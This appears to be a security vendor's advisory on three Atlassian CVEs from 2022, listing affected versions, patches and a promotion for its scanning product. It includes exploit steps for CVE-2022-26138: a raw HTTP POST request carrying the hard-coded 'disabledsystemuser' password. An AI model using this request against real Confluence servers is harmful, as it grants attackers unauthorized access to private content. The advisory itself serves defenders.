Atlassian released patches for three critical vulnerabilities (CVE-2022-26136, CVE-2022-26137, CVE-2022-26138). Out of the three flaws, two impacts Confluence Server, Confluence Data Center, and some other products, as well as Bamboo, BitBucket, Fisheye, and Jira, and one of the flaws impacts only Confluence Server and Data Center. A sound Patch Management Software can prevent such attacks from occurring.
The vulnerabilities are tracked as CVE-2022-26136 (Arbitrary Servlet Filter Bypass), CVE-2022-26137 (Additional Servlet Filter Invocation), and CVE-2022-26138 (Default login). POC is available for CVE-2022-26138 “Questions For Confluence – Default Login”. At the time of writing, there is no POC available for CVE-2022-26136 or CVE-2022-26137.
Technical Details for Atlassian Critical Vulnerabilities
CVE-2022-26136, CVE-2022-26137 – By sending a specially crafted HTTP request, an unauthenticated, remote attacker may be able to successfully exploit the flaws (CVE-2022-26136 and CVE-2022-26137), bypassing the authentication used by third-party apps, run any JavaScript code, and get around the cross-origin resource sharing (CORS) browser mechanism. The vendor has released a patch for these flaws.
CVE-2022-26138 – An unauthenticated remote attacker can exploit this vulnerability, by using hard-coded credentials. As a result, the attacker gets a login to the confluence and can access any page the confluence user group has access to.
The vulnerability cannot be fixed by uninstalling the Questions for Confluence application either. Users can delete or disable the “disabledsystemuser” user or apply the patch by the vendor.
Steps to Exploit CVE-2022-26138
These are some steps to exploit the critical vulnerabilities uncovered by Atlassian:
- Send POST Request to “/dologin.action” endpoint.
- Add post data as “os_username=disabledsystemuser&os_password=disabledsystemuser6708&login=Log+in&os_destination=%2Fhttpvoid.action”
- This POST request will provide a login to the confluence server or data center.
POST /dologin.action HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencodedos_username=disabledsystemuser&os_password=disabledsystemuser6708&login=Log+in&os_destination=%2Fhttpvoid.action
Affected Versions from the critical vulnerabilities uncovered by Atlassian:
1.CVE-2022-26136, CVE-2022-26137:
- Atlassian Bamboo Server and Data Center Versions < 7.2.9, 8.0.x < 8.0.9, 8.1.x < 8.1.8, 8.2.x < 8.2.4
- Atlassian Bitbucket Server and Data Center Versions < 7.6.16, All versions 7.7.x through 7.16.x, 7.17.x < 7.17.8, All versions 7.18.x, 7.19.x < 7.19.5, 7.20.x < 7.20.2, 7.21.x < 7.21.2, 8.0.0 8.1.0
- Atlassian Confluence Server and Data Center Versions < 7.4.17, All versions 7.5.x through 7.12.x, 7.13.x < 7.13.7, 7.14.x < 7.14.3, 7.15.x < 7.15.2, 7.16.x < 7.16.4, 7.17.x < 7.17.4, 7.18.0
- Atlassian Crowd Server and Data Center Versions < 4.3.8, 4.4.x < 4.4.2, 5.0.0
- Atlassian Crucible Versions < 4.8.10
- Atlassian Fisheye Versions < 4.8.10
- Atlassian Jira Server and Data Center Versions < 8.13.22, All versions 8.14.x through 8.19.x, 8.20.x < 8.20.10, All versions 8.21.x, 8.22.x < 8.22.4
Note: 8.22.4 is not affected, but it contains a security bug unrelated to this CVE.
- Atlassian Jira Service Management Server and Data Center Versions < 4.13.22, All versions 4.14.x through 4.19.x, 4.20.x < 4.20.10, All versions 4.21.x, 4.22.x < 4.22.4
2.CVE-2022-26138:
- Questions for Confluence App 2.7.34, 2.7.35, 3.0.2 for Confluence Server and Confluence Data Center
Solutions for the the critical vulnerabilities uncovered by Atlassian:
1.CVE-2022-26136, CVE-2022-26137:
- Atlassian Bamboo Server and Data Center 7.2.x >= 7.2.9, 8.0.x >= 8.0.9, 8.1.x >= 8.1.8, 8.2.x >= 8.2.4, Versions >= 9.0.0
- Atlassian Bitbucket Server and Data Center 7.6.x >= 7.6.16 (LTS), 7.17.x >= 7.17.8 (LTS), 7.19.x >= 7.19.5, 7.20.x >= 7.20.2, 7.21.x >= 7.21.2 (LTS), 8.0.x >= 8.0.1, 8.1.x >= 8.1.1, Versions >= 8.2.0
- Atlassian Confluence Server and Data Center 7.4.x >= 7.4.17 (LTS), 7.13.x >= 7.13.7 (LTS), 7.14.x >= 7.14.3, 7.15.x >= 7.15.2, 7.16.x >= 7.16.4, 7.17.x >= 7.17.4, 7.18.x >= 7.18.1
- Atlassian Crowd Server and Data Center 4.3.x >= 4.3.8, 4.4.x >= 4.4.2, Versions >= 5.0.1, Atlassian Crucible, Versions >= 4.8.10, Atlassian Fisheye, Versions >= 4.8.10
- Atlassian Jira Server and Data Center 8.13.x >= 8.13.22 (LTS), 8.20.x >= 8.20.10 (LTS), 8.22.x >= 8.22.4, Versions >= 9.0.0
- Atlassian Jira Service Management Server and Data Center 4.13.x >= 4.13.22 (LTS), 4.20.x >= 4.20.10 (LTS), 4.22.x >= 4.22.4, Versions >= 5.0.0
Note: 4.22.5 contains a security vulnerability, so upgrade to 4.22.6
2.CVE-2022-26138:
There are two solutions for this critical vulnerability found by Atlassian:
- Solution 1:
- Upgrade to Questions for Confluence App>= 2.7.38 (requires Confluence 6.13.18 through 7.16.2) or >= 3.0.5 (requires Confluence 7.16.3 and later).
Uninstalling Questions for Confluence app will not fix this issue. After the app is uninstalled, the disabledsystemuser account is not automatically deleted.
- Solution 2:
- Delete or disable “disabledsystemuser” account
These are the remedies to avoid being exploited by the Critical Vulnerabilities uncovered by Atlassian.
SanerNow Advanced Vulnerability Management detects these Vulnerabilities and fixes them; Use SanerNow and keep your systems updated and secure.